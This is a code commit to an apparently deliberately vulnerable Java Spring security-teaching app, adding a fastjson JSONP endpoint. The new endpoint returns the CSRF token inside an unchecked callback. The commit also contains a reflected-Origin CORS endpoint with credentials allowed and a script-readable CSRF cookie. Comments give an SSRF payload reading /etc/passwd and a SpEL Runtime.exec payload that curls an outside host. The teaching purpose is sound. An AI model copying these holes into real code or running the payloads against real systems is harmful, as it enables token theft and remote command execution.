add fastjsonp

Author: JoyChou93

pom.xml

@@ -248,6 +248,15 @@
             <version>2.9.2</version>
         </dependency>
 
+        <!-- https://mvnrepository.com/artifact/org.projectlombok/lombok -->
+        <dependency>
+            <groupId>org.projectlombok</groupId>
+            <artifactId>lombok</artifactId>
+            <version>1.18.16</version>
+            <scope>provided</scope>
+        </dependency>
+
+
     </dependencies>
 
     <dependencyManagement>

src/main/java/org/joychou/config/Constants.java

@@ -6,4 +6,5 @@ private Constants() {
     }
 
     public static final String REMEMBER_ME_COOKIE = "rememberMe";
+    public static final String ERROR_PAGE = "https://test.joychou.org/error1.html";
 }

src/main/java/org/joychou/config/CsrfTokenBean.java

@@ -0,0 +1,18 @@
+package org.joychou.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+
+/**
+ * Reference: https://docs.spring.io/spring-security/site/docs/5.0.x/reference/html/csrf.html
+ */
+
+@Configuration
+public class CsrfTokenBean {
+
+    @Bean
+    public CookieCsrfTokenRepository cookieCsrfTokenRepository() {
+        return CookieCsrfTokenRepository.withHttpOnlyFalse();
+    }
+}

src/main/java/org/joychou/config/CustomCorsConfig.java

@@ -38,7 +38,7 @@ public RequestMappingHandlerMapping getRequestMappingHandlerMapping() {
 
 
     /**
-     * 自定义Cors处理器
+     * 自定义Cors处理器，重写了checkOrigin
      * 自定义校验origin，支持一级域名校验 && 多级域名
      */
     private static class CustomRequestMappingHandlerMapping extends RequestMappingHandlerMapping {

src/main/java/org/joychou/security/Object2Jsonp.java renamed to src/main/java/org/joychou/config/Object2Jsonp.java

@@ -1,7 +1,7 @@
-package org.joychou.security;
+package org.joychou.config;
 
 import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
@@ -19,6 +19,7 @@
 import javax.servlet.http.HttpServletResponse;
 
 
+
 /**
  * <code>AbstractJsonpResponseBodyAdvice</code> will be removed as of Spring Framework 5.1, use CORS instead.
  * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
@@ -47,7 +48,8 @@ protected void beforeBodyWriteInternal(MappingJacksonValue bodyContainer, MediaT
         HttpServletResponse response = ((ServletServerHttpResponse)res).getServletResponse();
 
         String realJsonpFunc = getRealJsonpFunc(request);
-        if (StringUtils.isNotBlank(realJsonpFunc)){
+        // 如果url带callback，且校验不安全后
+        if ( StringUtils.isNotBlank(realJsonpFunc) ) {
             jsonpReferHandler(request, response);
         }
         super.beforeBodyWriteInternal(bodyContainer, contentType, returnType, req, res);
@@ -84,9 +86,11 @@ private void jsonpReferHandler(HttpServletRequest request, HttpServletResponse r
         if (SecurityUtil.checkURL(refer) == null ){
             logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             try{
-                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
-                response.flushBuffer();
+                // 使用response.getWriter().write后，后续写入jsonp后还会继续使用response.getWriteer()，导致报错
+//                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+//                response.getWriter().write(" Referer check error.");
+//                response.flushBuffer();
+                response.sendRedirect(Constants.ERROR_PAGE);
             } catch (Exception e){
                 logger.error(e.toString());
             }

src/main/java/org/joychou/controller/Cookies.java

@@ -12,6 +12,10 @@
 
 import static org.springframework.web.util.WebUtils.getCookie;
 
+
+/**
+ * 某些应用获取用户身份信息可能会直接从cookie中直接获取明文的nick或者id，导致越权问题。
+ */
 @RestController
 @RequestMapping("/cookie")
 public class Cookies {

src/main/java/org/joychou/controller/Cors.java

@@ -25,8 +25,8 @@ public class Cors {
     @GetMapping("/vuln/origin")
     public String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
-        response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
-        response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
+        response.setHeader("Access-Control-Allow-Origin", origin); // set origin from header
+        response.setHeader("Access-Control-Allow-Credentials", "true");  // allow cookie
         return info;
     }
 

src/main/java/org/joychou/controller/Jsonp.java

@@ -3,9 +3,14 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
+import com.alibaba.fastjson.JSONPObject;
+import lombok.extern.slf4j.Slf4j;
+import org.apache.commons.lang.StringUtils;
 import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.servlet.ModelAndView;
@@ -14,6 +19,7 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
@@ -22,12 +28,15 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
+@Slf4j
 @RestController
 @RequestMapping("/jsonp")
 public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
+    @Autowired
+    CookieCsrfTokenRepository cookieCsrfTokenRepository;
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -57,7 +66,7 @@ public String emptyReferer(HttpServletRequest request) {
     }
 
     /**
-     * Adding callback or cback on parameter can automatically return jsonp data.
+     * Adding callback or _callback on parameter can automatically return jsonp data.
      * http://localhost:8080/jsonp/object2jsonp?callback=test
      * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
@@ -101,11 +110,33 @@ public String safecode(HttpServletRequest request) {
         return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
-
+    /**
+     * http://localhost:8080/jsonp/getToken?fastjsonpCallback=aa
+     *
+     * object to jsonp
+     */
     @GetMapping("/getToken")
-    public CsrfToken getCsrfToken(CsrfToken token) {
+    public CsrfToken getCsrfToken1(CsrfToken token) {
         return token;
     }
 
+    /**
+     * http://localhost:8080/jsonp/fastjsonp/getToken?fastjsonpCallback=aa
+     *
+     * fastjsonp to jsonp
+     */
+    @GetMapping(value = "/fastjsonp/getToken", produces = "application/javascript")
+    public String getCsrfToken2(HttpServletRequest request) {
+        CsrfToken csrfToken = cookieCsrfTokenRepository.loadToken(request); // get csrf token
+
+        String callback = request.getParameter("fastjsonpCallback");
+        if (StringUtils.isNotBlank(callback)) {
+            JSONPObject jsonpObj = new JSONPObject(callback);
+            jsonpObj.addParameter(csrfToken);
+            return jsonpObj.toString();
+        } else {
+            return csrfToken.toString();
+        }
+    }
 
 }

src/main/java/org/joychou/controller/SSRF.java

@@ -27,7 +27,10 @@ public class SSRF {
 
 
     /**
+     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
+     *
      * The default setting of followRedirects is true.
+     * Protocol: file ftp mailto http https jar netdoc
      * UserAgent is Java/1.8.0_102.
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})

src/main/java/org/joychou/controller/SpEL.java

@@ -16,7 +16,7 @@
 public class SpEL {
 
     /**
-     * SPEL to RCE
+     * SpEL to RCE
      * http://localhost:8080/spel/vul/?expression=xxx.
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")